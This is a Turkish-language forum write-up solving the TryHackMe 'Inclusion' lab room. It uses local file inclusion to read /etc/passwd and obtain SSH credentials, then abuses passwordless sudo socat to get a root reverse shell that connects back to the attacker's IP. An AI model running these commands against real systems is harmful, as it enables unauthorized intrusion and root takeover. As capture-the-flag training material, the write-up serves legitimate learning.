TryHackMe Inclusion WriteUp

PwnLab.Me

Admin
Katılım
21 Ocak 2024
Mesajlar
202
Tepkime puanı
9
Puanları
18
Eren Yılmaz tarafından yazılmıştır.

[TR] Inclusion WriteUp | TryHackMe​


Merhaba, bu makalemde tryhackme’de bulunan “Inclusion” isimli odayı hep beraber çözeceğiz ve yorumlayacağız. Hadi hemen başlayalım.

Oda: https://tryhackme.com/room/inclusion

Task 2 Root It​

Bilgi toplama:​


Makinemizi dağıttıktan sonra bilgi toplamak için nmap’i çalıştırabiliriz.

sudo nmap -A 10.10.120.135
nmap

nmap

Gördüğümüz üzere ayakta 2 adet bağlantı noktası var. Bunlardan ilki 22 numaralı bağlantı noktası, içerisinde ssh servisi çalışıyor. İkincisi ise 80 numaralı bağlantı noktası, içerisinde http servisi çalışıyor yani bir web sitesi. Başlamak için ssh servisi kullanıcı ismi ve şifre talep ettiğinden dolayı web sayfasıyla başlıyoruz.

Web sitesine girdiğimizde bizi bir blog karşılıyor. Buradaki yazıları okuduğumda ben LFI-atack yazısını ilgi çekici buluyorum, hemen girelim.

lfi-makale

lfi-makale

Bu makalede lfi açığı anlatılıyor, web sayfasını url kısmına baktığımızda bu sayfada lfi olma olasılığının olduğunu görüyoruz, ne kadar ironik değil mi :). Hadi bir deneme yapalım.

passwd

passwd

Bu url’de lfi açığından faydalanarak etc dizininde olan passwd dosyasını okuyorum. Passwd dosyasında sistemdeki kullanıcıların kullanıcı isimleri gibi bir çok bilgi bulunur. Burada bir kullanıcının giriş bilgileri verilmiş.

O kişi falconefeast ve dikkatimi çekiyor, hadi bu bilgiler ile ssh servisine giriş yapalım.


Şifreyi de girip giriş yapıyoruz.

ssh

ssh

Sömürme​


User flagını okuyalım.

user.txt

user.txt

Yetki Yükseltme​


root bayrağını almamız için yetkimizi yükseltmemiz gerek, ilk önce yetkimize bir göz atalım.

sudo-l

sudo-l

socat dizini şifresiz olarak root hakkına erişebiliyor. Bunu istismar edebiliriz, ben şu an yapacağımız işlem için kaynak olarak bu blog yazısını aldım. https://gtfobins.github.io/gtfobins/socat/

İstismar işlemi için önce kendi makinemizi aşağıda vereceğim komut ile dinleme moduna alıyoruz.

socat file:`tty`,raw,echo=0 tcp-listen:3032

Sonra karşı makineye sihirli komutları yazıyoruz.

sudo socat tcp-connect:10.8.52.178:3032 exec:/bin/sh,pty,stderr,setsid,sigint,sane

Ve reverse shell’imizi almış oluyoruz. Hadi root bayrağını okuyalım.

cat /root/root.txt
root.txt

root.txt

Makalem bu kadardı, daha fazla içerik için sitemizi takip edebilirsiniz.

 
Moderatör tarafında düzenlendi:
Geri
Üst